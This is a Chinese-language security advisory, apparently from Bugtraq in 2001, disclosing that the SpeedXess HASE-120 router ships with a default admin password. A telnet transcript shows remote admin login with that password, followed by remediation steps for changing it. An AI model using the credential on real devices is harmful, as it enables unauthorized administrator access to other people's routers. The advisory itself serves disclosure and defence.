SpeedXess HASE-120 存在默认密码发布时间:2001-12-05 更新时间:2001-12-05 严重程度:高 威胁程度:远程管理员权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 SpeedXess HASE-120(IPOA Router)详细描述 SpeedXess HASE-120路由器存在默认密码speedxess,可以导致远程用户获得系统管理员的访问。 测试代码 telnet Target (target: speedxess hase-120 router address) ##### # # # # ##### ###### ###### ##### # # ###### #### #### # # # # # # # # # # # # ##### # # ##### ##### # # # ##### #### #### # ##### # # # # # # # # # # # # # # # # # # # # # # # ##### # ###### ###### ##### # # ###### #### #### # # # ##### ####### # #### ### # # # # # # # ## # # # # # # # # # # # # # # # ####### # # ##### ###### ##### # #### # # # # ####### # # # # # # # # # # # # # # # # # # # # # ##### ####### ##### ###### ### SpeedXess HASE-120(IPOA Router) Application Start... Welcome to HASE-120(IPOA Router) Management Interface Enter Password: <------ master password input : speedxess HASE-120(I) - Main Menu [S] System [A] Atm interface [D] Dsl interface [E] Ethernet interface [I] IPOA interface [R] Router [X] eXit Enter Selection: X Do you want to exit? (Y)es, (N)o : YESSession End Connection closed by foreign host. [secret@secret:~]$ 解决方案 临时方法:改变密码: 1.连接路由器. 2.选择"S" HASE-120(I) - Main Menu [S] System [A] Atm interface [D] Dsl interface [E] Ethernet interface [I] IPOA interface [R] Router [X] eXit Enter Selection: S HASE-120(I) - Main Menu - System Firmware Version HASE-120-1101 System Uptime(YYMMDDhhmmss) ??:??:??:??:??:?? Name of System Owned by Secret Contact Name Secret Secure Lab Location France Ethernet Address 00:00:??:??:??:14 IP Address 211.xxx.xxx.xxx Subnet Mask 255.255.255.xxx [P] Password change [F] Firmware upgrade [S] Setting values [R] Reset system [I] rs-232 Interface [A] ARP table [X] eXit Enter Selection: 3. 选择 "P" 改变密码. Enter Selection: P Enter New Password (up to 10 characters): Re-enter New Password: Recording Changes. This may take a while...Done Password is changed successfully. 相关信息 profre@hanmail.net 参考:http://archives.neohapsis.com/archives/bugtraq/2001-12/0032.html |
